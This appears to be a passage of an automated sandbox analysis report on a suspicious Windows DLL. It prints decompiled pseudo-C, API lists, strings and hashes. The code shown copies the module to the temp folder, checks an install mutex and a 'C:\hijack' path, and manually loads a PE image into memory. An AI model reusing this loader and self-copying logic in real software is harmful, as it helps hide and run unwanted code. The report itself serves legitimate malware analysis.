                                                                                                                                                      				intOrPtr _t114;
                                                                                                                                                      				void* _t115;
                                                                                                                                                      				intOrPtr _t116;
                                                                                                                                                      				intOrPtr _t118;
                                                                                                                                                      				intOrPtr _t120;
                                                                                                                                                      				void* _t125;
                                                                                                                                                      
                                                                                                                                                      				_t125 = __eflags;
                                                                                                                                                      				_t100 = __edi;
                                                                                                                                                      				_t82 = __ebx;
                                                                                                                                                      				_push(0xffffffff);
                                                                                                                                                      				_push(E10022D01);
                                                                                                                                                      				_push( *[fs:0x0]);
                                                                                                                                                      				 *[fs:0x0] = _t104;
                                                                                                                                                      				_push(_t101);
                                                                                                                                                      				E1001FD60();
                                                                                                                                                      				_v312 = 0;
                                                                                                                                                      				E1000CF20(__edi,  &_v311, 0, 0x103);
                                                                                                                                                      				GetModuleFileNameA(0,  &_v312, 0x104);
                                                                                                                                                      				E1001A600(__ebx, _t100, _t101, _t125,  &_v44); // executed
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_t46 = E10001A50( &_v312, E100011E0( &_v44));
                                                                                                                                                      				_t108 = _t104 - 0x264 + 0x18;
                                                                                                                                                      				_t126 = _t46;
                                                                                                                                                      				if(_t46 == 0) {
                                                                                                                                                      					_t47 = E1001A0F0("Global\\exist_sign__install_r3");
                                                                                                                                                      					_t109 = _t108 + 4;
                                                                                                                                                      					__eflags = _t47;
                                                                                                                                                      					if(_t47 == 0) {
                                                                                                                                                      						_v576 = 0;
                                                                                                                                                      						E1000CF20(_t100,  &_v575, 0, 0x103);
                                                                                                                                                      						GetTempPathA(0x104,  &_v576);
                                                                                                                                                      						E1000CD96( &_v576,  &_v576, 0x104, E100011E0( &_v44));
                                                                                                                                                      						_t111 = _t109 + 0x18;
                                                                                                                                                      						CopyFileA( &_v312,  &_v576, 0);
                                                                                                                                                      						_v580 = GetTickCount();
                                                                                                                                                      						while(1) {
                                                                                                                                                      							_t56 = E1001A170( &_v312);
                                                                                                                                                      							_t102 = _t56;
                                                                                                                                                      							_t57 = E1001A170( &_v576);
                                                                                                                                                      							_t111 = _t111 + 8;
                                                                                                                                                      							__eflags = _t56 - _t57;
                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                      								break;
                                                                                                                                                      							}
                                                                                                                                                      							Sleep(0x3e8);
                                                                                                                                                      							__eflags = GetTickCount() - _v580 - 0x7530;
                                                                                                                                                      							if(__eflags <= 0) {
                                                                                                                                                      								continue;
                                                                                                                                                      							} else {
                                                                                                                                                      							}
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						E1001FDB0();
                                                                                                                                                      						E1001FF90(_t82, _t100, _t102, __eflags, "install", "user01", "-0.25", "45.0.0", "exe");
                                                                                                                                                      						_t114 = _t111 + 0x14 - 0x1c;
                                                                                                                                                      						_t89 = _t114;
                                                                                                                                                      						_v588 = _t114;
                                                                                                                                                      						_v612 = E10001160(_t114, __eflags, "status=main_start");
                                                                                                                                                      						E10020180(_t82, _t100, _t102, __eflags);
                                                                                                                                                      						_t115 = _t114 + 0x1c;
                                                                                                                                                      						__eflags = PathFileExistsA("C:\\hijack");
                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                      							L15:
                                                                                                                                                      							_t116 = _t115 - 0x1c;
                                                                                                                                                      							_v592 = _t116;
                                                                                                                                                      							_v616 = E10001160(_t116, __eflags, "status=check_debug");
                                                                                                                                                      							E10020180(_t82, _t100, _t102, __eflags);
                                                                                                                                                      							_t118 = _t116 + 0x1c - 0x1c;
                                                                                                                                                      							_v596 = _t118;
                                                                                                                                                      							_v620 = E10001160(_t118, __eflags, "user01");
                                                                                                                                                      							E1001FEA0(_t82, _t100, _t102, __eflags);
                                                                                                                                                      							_t120 = _t118 + 0x1c - 0x1c;
                                                                                                                                                      							_v600 = _t120;
                                                                                                                                                      							_v624 = E10001160(_t120, __eflags, "user01");
                                                                                                                                                      							E1001FDC0(_t82, _t100, _t102, __eflags);
                                                                                                                                                      							_v604 = _t120 + 0x1c - 0x1c;
                                                                                                                                                      							_v628 = E10001160(_t120 + 0x1c - 0x1c, __eflags, "status=main_over");
                                                                                                                                                      							E10020180(_t82, _t100, _t102, __eflags);
                                                                                                                                                      						} else {
                                                                                                                                                      							E1001A0A0();
                                                                                                                                                      							_t75 = E1001A0B0(_t89);
                                                                                                                                                      							__eflags = _t75;
                                                                                                                                                      							if(_t75 == 0) {
                                                                                                                                                      								L12:
                                                                                                                                                      							} else {
                                                                                                                                                      								__eflags = E10019D10();
                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                      									_t77 = E1001FA30(_t82, _t100, _t102, __eflags, 0x3e8, 0);
                                                                                                                                                      									_t115 = _t115 + 8;
                                                                                                                                                      									__eflags = _t77;
                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                      										goto L15;
                                                                                                                                                      									} else {
                                                                                                                                                      									}
                                                                                                                                                      								} else {
                                                                                                                                                      									goto L12;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      					}
                                                                                                                                                      					E1001A260();
                                                                                                                                                      					_v608 = 1;
                                                                                                                                                      					_v8 = 0xffffffff;
                                                                                                                                                      					E100011A0( &_v44);
                                                                                                                                                      					_t73 = _v608;
                                                                                                                                                      				} else {
                                                                                                                                                      					E10020A80(__ebx, _t100, _t101, _t126, "45.0.0"); // executed
                                                                                                                                                      					_v584 = 1;
                                                                                                                                                      					_v8 = 0xffffffff;
                                                                                                                                                      					E100011A0( &_v44);
                                                                                                                                                      					_t73 = _v584;
                                                                                                                                                      				}
                                                                                                                                                      				 *[fs:0x0] = _v16;
                                                                                                                                                      				return _t73;
                                                                                                                                                      			}

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 100204F9
                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1002050F
                                                                                                                                                        • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                        • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                        • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileModuleName_memset$_sprintf
                                                                                                                                                      • String ID: -0.25$45.0.0$45.0.0$C:\hijack$Global\exist_sign__install_r3$exe$install$status=check_debug$status=main_over$status=main_start$user01$user01$user01
                                                                                                                                                      • API String ID: 3079340674-1842766907
                                                                                                                                                      • Opcode ID: 223e698365b0860e5aae29af135c91e351df2f6d4b25efb7f7cfea949ec79a0c
                                                                                                                                                      • Instruction ID: 7a4b6182ef5b3e753845166e3f5bee58e7f320f9ef64b03b030670d1f597adbb
                                                                                                                                                      • Opcode Fuzzy Hash: 223e698365b0860e5aae29af135c91e351df2f6d4b25efb7f7cfea949ec79a0c
                                                                                                                                                      • Instruction Fuzzy Hash: 5351A1B5D04318ABEB20EBA4DC4BBDE7775DB50344F500194F90966182EB71BB84CFA2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001A170(CHAR* _a4) {
                                                                                                                                                      				struct _WIN32_FIND_DATAA _v324;
                                                                                                                                                      				intOrPtr _v328;
                                                                                                                                                      				void* _v332;
                                                                                                                                                      				void* _t11;
                                                                                                                                                      
                                                                                                                                                      				_v328 = 0;
                                                                                                                                                      				_t11 = FindFirstFileA(_a4,  &_v324); // executed
                                                                                                                                                      				_v332 = _t11;
                                                                                                                                                      				if(_v332 != 0xffffffff) {
                                                                                                                                                      					_v328 = _v324.nFileSizeLow;
                                                                                                                                                      				}
                                                                                                                                                      				FindClose(_v332); // executed
                                                                                                                                                      				return _v328;
                                                                                                                                                      			}








                                                                                                                                                      APIs
                                                                                                                                                      • FindFirstFileA.KERNEL32(1001A679,?), ref: 1001A18E
                                                                                                                                                      • FindClose.KERNEL32(000000FF), ref: 1001A1B6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2295610775-0
                                                                                                                                                      • Opcode ID: 0d0f7e1b90d12563d86b766f37a796064df2748116d1dddbb477bfb1d1da362b
                                                                                                                                                      • Instruction ID: 097559f34e7186eb2c7e5fd791b7ca3a953ceb1394cb31efbd5b4482c630521c
                                                                                                                                                      • Opcode Fuzzy Hash: 0d0f7e1b90d12563d86b766f37a796064df2748116d1dddbb477bfb1d1da362b
                                                                                                                                                      • Instruction Fuzzy Hash: 66F0C974D0022C9BDB70DF64DD88BDDB7B8AB48310F1042D4E91DA32A0DA30AED58F50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 73%
                                                                                                                                                      			E1001B620(void* __ebx, void* __edi, void* __esi, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				signed short* _v16;
                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                      				_Unknown_base(*)()* _v28;
                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                      				signed int _v36;
                                                                                                                                                      				intOrPtr _v68;
                                                                                                                                                      				char _v72;
                                                                                                                                                      				void* _v76;
                                                                                                                                                      				intOrPtr _v80;
                                                                                                                                                      				intOrPtr* _v84;
                                                                                                                                                      				intOrPtr _v88;
                                                                                                                                                      				intOrPtr _v92;
                                                                                                                                                      				intOrPtr _v96;
                                                                                                                                                      				intOrPtr _v100;
                                                                                                                                                      				void* _t170;
                                                                                                                                                      				void* _t173;
                                                                                                                                                      				void* _t182;
                                                                                                                                                      				intOrPtr _t184;
                                                                                                                                                      				void* _t194;
                                                                                                                                                      				void* _t203;
                                                                                                                                                      				void* _t206;
                                                                                                                                                      				void* _t207;
                                                                                                                                                      				void* _t209;
                                                                                                                                                      				intOrPtr _t220;
                                                                                                                                                      				intOrPtr _t225;
                                                                                                                                                      				void* _t239;
                                                                                                                                                      				intOrPtr _t311;
                                                                                                                                                      				void* _t326;
                                                                                                                                                      				void* _t327;
                                                                                                                                                      				void* _t328;
                                                                                                                                                      				void* _t329;
                                                                                                                                                      				void* _t330;
                                                                                                                                                      				void* _t332;
                                                                                                                                                      				void* _t333;
                                                                                                                                                      				void* _t334;
                                                                                                                                                      				void* _t337;
                                                                                                                                                      				void* _t338;
                                                                                                                                                      				void* _t339;
                                                                                                                                                      
                                                                                                                                                      				_t327 = __esi;
                                                                                                                                                      				_t326 = __edi;
                                                                                                                                                      				_t239 = __ebx;
                                                                                                                                                      				_v76 = 0;
                                                                                                                                                      				_v20 = 0;
                                                                                                                                                      				_v28 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetNativeSystemInfo");
                                                                                                                                                      				_t170 = E1001AE40(_a8, 0x40);
                                                                                                                                                      				_t329 = _t328 + 8;
                                                                                                                                                      				if(_t170 != 0) {
                                                                                                                                                      					_v16 = _a4;
                                                                                                                                                      					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
                                                                                                                                                      						_t9 =  &(_v16[0x1e]); // 0xc707ebe8
                                                                                                                                                      						_t173 = E1001AE40(_a8,  *_t9 + 0xf8);
                                                                                                                                                      						_t330 = _t329 + 8;
                                                                                                                                                      						if(_t173 != 0) {
                                                                                                                                                      							_t13 =  &(_v16[0x1e]); // 0xc707ebe8
                                                                                                                                                      							_v84 = _a4 +  *_t13;
                                                                                                                                                      							if( *_v84 == 0x4550) {
                                                                                                                                                      								if(( *(_v84 + 4) & 0x0000ffff) == 0x14c) {
                                                                                                                                                      									if(( *(_v84 + 0x38) & 0x00000001) == 0) {
                                                                                                                                                      										_v88 = _v84 + ( *(_v84 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                      										_v36 =  *(_v84 + 0x38);
                                                                                                                                                      										_v12 = 0;
                                                                                                                                                      										while(_v12 < ( *(_v84 + 6) & 0x0000ffff)) {
                                                                                                                                                      											if( *((intOrPtr*)(_v88 + 0x10)) != 0) {
                                                                                                                                                      												_v92 =  *((intOrPtr*)(_v88 + 0xc)) +  *((intOrPtr*)(_v88 + 0x10));
                                                                                                                                                      											} else {
                                                                                                                                                      												_v92 =  *((intOrPtr*)(_v88 + 0xc)) + _v36;
                                                                                                                                                      											}
                                                                                                                                                      											if(_v92 > _v20) {
                                                                                                                                                      												_v20 = _v92;
                                                                                                                                                      											}
                                                                                                                                                      											_v12 = _v12 + 1;
                                                                                                                                                      											_v88 = _v88 + 0x28;
                                                                                                                                                      										}
                                                                                                                                                      										_v28( &_v72);
                                                                                                                                                      										_v32 = E1001AE80( *((intOrPtr*)(_v84 + 0x50)), _v68);
                                                                                                                                                      										_t182 = E1001AE80(_v20, _v68);
                                                                                                                                                      										_t332 = _t330 + 0x10;
                                                                                                                                                      										if(_v32 == _t182) {
                                                                                                                                                      											_t184 = _a12( *((intOrPtr*)(_v84 + 0x34)), _v32, 0x3000, 4, _a32);
                                                                                                                                                      											_t333 = _t332 + 0x14;
                                                                                                                                                      											_v24 = _t184;
                                                                                                                                                      											if(_v24 != 0) {
                                                                                                                                                      												L26:
                                                                                                                                                      												_v76 = HeapAlloc(GetProcessHeap(), 8, 0x40);
                                                                                                                                                      												if(_v76 != 0) {
                                                                                                                                                      													 *((intOrPtr*)(_v76 + 4)) = _v24;
                                                                                                                                                      													asm("sbb ecx, ecx");
                                                                                                                                                      													 *(_v76 + 0x14) =  ~( ~( *(_v84 + 0x16) & 0x2000));
                                                                                                                                                      													 *((intOrPtr*)(_v76 + 0x1c)) = _a12;
                                                                                                                                                      													 *((intOrPtr*)(_v76 + 0x20)) = _a16;
                                                                                                                                                      													 *((intOrPtr*)(_v76 + 0x24)) = _a20;
                                                                                                                                                      													 *((intOrPtr*)(_v76 + 0x28)) = _a24;
                                                                                                                                                      													 *((intOrPtr*)(_v76 + 0x2c)) = _a28;
                                                                                                                                                      													 *((intOrPtr*)(_v76 + 0x34)) = _a32;
                                                                                                                                                      													 *((intOrPtr*)(_v76 + 0x3c)) = _v68;
                                                                                                                                                      													_t194 = E1001AE40(_a8,  *((intOrPtr*)(_v84 + 0x54)));
                                                                                                                                                      													_t334 = _t333 + 8;
                                                                                                                                                      													if(_t194 != 0) {
                                                                                                                                                      														_v8 = _a12(_v24,  *((intOrPtr*)(_v84 + 0x54)), 0x1000, 4, _a32);
                                                                                                                                                      														E1000D190(_t239, _t326, _t327, _v8, _v16,  *((intOrPtr*)(_v84 + 0x54)));
                                                                                                                                                      														_t121 =  &(_v16[0x1e]); // 0xc707ebe8
                                                                                                                                                      														 *_v76 = _v8 +  *_t121;
                                                                                                                                                      														 *((intOrPtr*)( *_v76 + 0x34)) = _v24;
                                                                                                                                                      														_t203 = E1001B300(_t239, _t326, _t327, _a4, _a8, _v84, _v76); // executed
                                                                                                                                                      														_t337 = _t334 + 0x30;
                                                                                                                                                      														if(_t203 != 0) {
                                                                                                                                                      															_t311 =  *((intOrPtr*)( *_v76 + 0x34)) -  *((intOrPtr*)(_v84 + 0x34));
                                                                                                                                                      															_v80 = _t311;
                                                                                                                                                      															if(_t311 == 0) {
                                                                                                                                                      																 *((intOrPtr*)(_v76 + 0x18)) = 1;
                                                                                                                                                      															} else {
                                                                                                                                                      																_t220 = E1001B0C0(_v76, _v80);
                                                                                                                                                      																_t337 = _t337 + 8;
                                                                                                                                                      																 *((intOrPtr*)(_v76 + 0x18)) = _t220;
                                                                                                                                                      															}
                                                                                                                                                      															_t206 = E1001AB60(_v76); // executed
                                                                                                                                                      															_t338 = _t337 + 4;
                                                                                                                                                      															if(_t206 != 0) {
                                                                                                                                                      																_t207 = E1001B490(_v76); // executed
                                                                                                                                                      																_t339 = _t338 + 4;
                                                                                                                                                      																if(_t207 != 0) {
                                                                                                                                                      																	_t209 = E1001AD80(_v76);
                                                                                                                                                      																	_t339 = _t339 + 4;
                                                                                                                                                      																	if(_t209 != 0) {
                                                                                                                                                      																		if( *((intOrPtr*)( *_v76 + 0x28)) == 0) {
                                                                                                                                                      																			 *((intOrPtr*)(_v76 + 0x38)) = 0;
                                                                                                                                                      																			L49:
                                                                                                                                                      																			return _v76;
                                                                                                                                                      																		}
                                                                                                                                                      																		if( *(_v76 + 0x14) == 0) {
                                                                                                                                                      																			 *((intOrPtr*)(_v76 + 0x38)) = _v24 +  *((intOrPtr*)( *_v76 + 0x28));
                                                                                                                                                      																			L47:
                                                                                                                                                      																			goto L49;
                                                                                                                                                      																		}
                                                                                                                                                      																		_v100 = _v24 +  *((intOrPtr*)( *_v76 + 0x28));
                                                                                                                                                      																		_v96 = _v100(_v24, 1, 0);
                                                                                                                                                      																		if(_v96 != 0) {
                                                                                                                                                      																			 *((intOrPtr*)(_v76 + 0x10)) = 1;
                                                                                                                                                      																			goto L47;
                                                                                                                                                      																		}
                                                                                                                                                      																		SetLastError(0x45a);
                                                                                                                                                      																		L50:
                                                                                                                                                      																		E1001A960(_v76);
                                                                                                                                                      																		return 0;
                                                                                                                                                      																	}
                                                                                                                                                      																	goto L50;
                                                                                                                                                      																}
                                                                                                                                                      																goto L50;
                                                                                                                                                      															}
                                                                                                                                                      															goto L50;
                                                                                                                                                      														}
                                                                                                                                                      														goto L50;
                                                                                                                                                      													}
                                                                                                                                                      													goto L50;
                                                                                                                                                      												}
                                                                                                                                                      												_a16(_v24, 0, 0x8000, _a32);
                                                                                                                                                      												SetLastError(0xe);
                                                                                                                                                      												return 0;
                                                                                                                                                      											}
                                                                                                                                                      											_t225 = _a12(0, _v32, 0x3000, 4, _a32);
                                                                                                                                                      											_t333 = _t333 + 0x14;
                                                                                                                                                      											_v24 = _t225;
                                                                                                                                                      											if(_v24 != 0) {
                                                                                                                                                      												goto L26;
                                                                                                                                                      											}
                                                                                                                                                      											SetLastError(0xe);
                                                                                                                                                      											return 0;
                                                                                                                                                      										}
                                                                                                                                                      										SetLastError(0xc1);
                                                                                                                                                      										return 0;
                                                                                                                                                      									}
                                                                                                                                                      									SetLastError(0xc1);
                                                                                                                                                      									return 0;
                                                                                                                                                      								}
                                                                                                                                                      								SetLastError(0xc1);
                                                                                                                                                      								return 0;
                                                                                                                                                      							}
                                                                                                                                                      							SetLastError(0xc1);
                                                                                                                                                      							return 0;
                                                                                                                                                      						}
                                                                                                                                                      						return 0;
                                                                                                                                                      					}
                                                                                                                                                      					SetLastError(0xc1);
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      				return 0;
                                                                                                                                                      			}

                                                                                                                                                      0x1001ba33
                                                                                                                                                      0x1001ba37
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001ba3f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b9c0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b9ab
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b996
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b94c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b8dc
                                                                                                                                                      0x1001b84f
                                                                                                                                                      0x1001b857
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b85d
                                                                                                                                                      0x1001b808
                                                                                                                                                      0x1001b80b
                                                                                                                                                      0x1001b80e
                                                                                                                                                      0x1001b815
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b819
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b81f
                                                                                                                                                      0x1001b7c5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b7cb
                                                                                                                                                      0x1001b70a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b710
                                                                                                                                                      0x1001b6ed
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b6f3
                                                                                                                                                      0x1001b6cc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b6d2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b6a9
                                                                                                                                                      0x1001b67f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b685
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 1001B63E
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 1001B645
                                                                                                                                                        • Part of subcall function 1001AE40: SetLastError.KERNEL32(0000000D,?,1001B659,100207E4,00000040), ref: 1001AE4D
                                                                                                                                                      • SetLastError.KERNEL32(000000C1), ref: 1001B67F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast$AddressHandleModuleProc
                                                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                      • API String ID: 1762409328-192647395
                                                                                                                                                      • Opcode ID: e3701e4d903ec74dc5ef954786c854f9baa6ea88c08b49a674e627b22a4b0214
                                                                                                                                                      • Instruction ID: 948ec142860bc01625bc2ce9e1704a97d6b06a0078abf06e4df2749841334317
                                                                                                                                                      • Opcode Fuzzy Hash: e3701e4d903ec74dc5ef954786c854f9baa6ea88c08b49a674e627b22a4b0214
                                                                                                                                                      • Instruction Fuzzy Hash: CAE1E5B4E00609DFDB04CF94C885AAEBBB5FF88304F648558E905AF395D774E982CB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 74%
                                                                                                                                                      			E1000E90E() {
                                                                                                                                                      				int _t13;
                                                                                                                                                      				long _t19;
                                                                                                                                                      				signed int _t20;
                                                                                                                                                      				signed int _t21;
                                                                                                                                                      				signed int _t22;
                                                                                                                                                      				signed int _t23;
                                                                                                                                                      				signed int _t27;
                                                                                                                                                      				signed int _t28;
                                                                                                                                                      				signed int _t32;
                                                                                                                                                      				signed int _t33;
                                                                                                                                                      				void* _t37;
                                                                                                                                                      				long _t39;
                                                                                                                                                      				void* _t40;
                                                                                                                                                      				signed int _t47;
                                                                                                                                                      				struct _OSVERSIONINFOA* _t49;
                                                                                                                                                      				void* _t51;
                                                                                                                                                      
                                                                                                                                                      				_t37 = GetProcessHeap;
                                                                                                                                                      				_t49 = HeapAlloc(GetProcessHeap(), 0, 0x94);
                                                                                                                                                      				if(_t49 != 0) {
                                                                                                                                                      					_t49->dwOSVersionInfoSize = 0x94;
                                                                                                                                                      					_t13 = GetVersionExA(_t49);
                                                                                                                                                      					__eflags = _t13;
                                                                                                                                                      					_push(_t49);
                                                                                                                                                      					_push(0);
                                                                                                                                                      					if(_t13 != 0) {
                                                                                                                                                      						 *(_t51 + 0xc) = _t49->dwPlatformId;
                                                                                                                                                      						 *(_t51 + 0x10) = _t49->dwMajorVersion;
                                                                                                                                                      						 *(_t51 - 4) = _t49->dwMinorVersion;
                                                                                                                                                      						_t47 = _t49->dwBuildNumber & 0x00007fff;
                                                                                                                                                      						HeapFree(GetProcessHeap(), ??, ??);
                                                                                                                                                      						_t19 =  *(_t51 + 0xc);
                                                                                                                                                      						__eflags = _t19 - 2;
                                                                                                                                                      						if(_t19 != 2) {
                                                                                                                                                      							_t47 = _t47 | 0x00008000;
                                                                                                                                                      							__eflags = _t47;
                                                                                                                                                      						}
                                                                                                                                                      						_t39 =  *(_t51 - 4);
                                                                                                                                                      						 *0x1033347c = _t19;
                                                                                                                                                      						_t20 =  *(_t51 + 0x10);
                                                                                                                                                      						_t44 = (_t20 << 8) + _t39;
                                                                                                                                                      						 *0x10333484 = (_t20 << 8) + _t39;
                                                                                                                                                      						 *0x10333488 = _t20;
                                                                                                                                                      						 *0x1033348c = _t39;
                                                                                                                                                      						 *0x10333480 = _t47;
                                                                                                                                                      						_t21 = E1000F7BF(1);
                                                                                                                                                      						__eflags = _t21;
                                                                                                                                                      						_pop(_t40);
                                                                                                                                                      						if(_t21 == 0) {
                                                                                                                                                      							goto L1;
                                                                                                                                                      						} else {
                                                                                                                                                      							_t23 = E100133E0(_t37);
                                                                                                                                                      							__eflags = _t23;
                                                                                                                                                      							if(_t23 != 0) {
                                                                                                                                                      								E10015081();
                                                                                                                                                      								 *0x10336f64 = GetCommandLineA();
                                                                                                                                                      								 *0x103332fc = E10014F4C(); // executed
                                                                                                                                                      								_t27 = E10014994(_t37, _t44, _t47, _t49, __eflags); // executed
                                                                                                                                                      								__eflags = _t27;
                                                                                                                                                      								if(_t27 >= 0) {
                                                                                                                                                      									_t28 = E10014E93(_t40);
                                                                                                                                                      									__eflags = _t28;
                                                                                                                                                      									if(_t28 < 0) {
                                                                                                                                                      										L15:
                                                                                                                                                      										E10014BD4();
                                                                                                                                                      										goto L10;
                                                                                                                                                      									} else {
                                                                                                                                                      										_t32 = E10014C20(_t40, _t44);
                                                                                                                                                      										__eflags = _t32;
                                                                                                                                                      										if(_t32 < 0) {
                                                                                                                                                      											goto L15;
                                                                                                                                                      										} else {
                                                                                                                                                      											_t33 = E1001167A(_t37, _t47, _t49, _t51, 0);
                                                                                                                                                      											__eflags = _t33;
                                                                                                                                                      											if(_t33 != 0) {
                                                                                                                                                      												goto L15;
                                                                                                                                                      											} else {
                                                                                                                                                      												 *0x103332f8 =  *0x103332f8 + 1;
                                                                                                                                                      												_t22 = 1;
                                                                                                                                                      												__eflags = 1;
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      								} else {
                                                                                                                                                      									L10:
                                                                                                                                                      									E100130CA();
                                                                                                                                                      									goto L8;
                                                                                                                                                      								}
                                                                                                                                                      							} else {
                                                                                                                                                      								L8:
                                                                                                                                                      								E1000F819();
                                                                                                                                                      								goto L1;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						HeapFree(GetProcessHeap(), ??, ??);
                                                                                                                                                      						goto L1;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					L1:
                                                                                                                                                      					_t22 = 0;
                                                                                                                                                      				}
                                                                                                                                                      				return _t22;
                                                                                                                                                      			}




















                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$Process$Free$AllocCommandEnvironmentInitializeLineStringsVersion___crt__cinit__heap_term__ioinit__ioterm__mtterm__setargv__setenvp
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2870529951-0
                                                                                                                                                      • Opcode ID: 6c4bbaa7a2ed88e341af398c15252e428cac03d6031402dac072d6ceb804dc07
                                                                                                                                                      • Instruction ID: 130607f004240c79eb30421efa65504882722ed8364210b240487f0131cf44a3
                                                                                                                                                      • Opcode Fuzzy Hash: 6c4bbaa7a2ed88e341af398c15252e428cac03d6031402dac072d6ceb804dc07
                                                                                                                                                      • Instruction Fuzzy Hash: 05317F75A043919BF750EFB2888175A77E8EF48381F21C429E909DA356EB34EC418B61
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
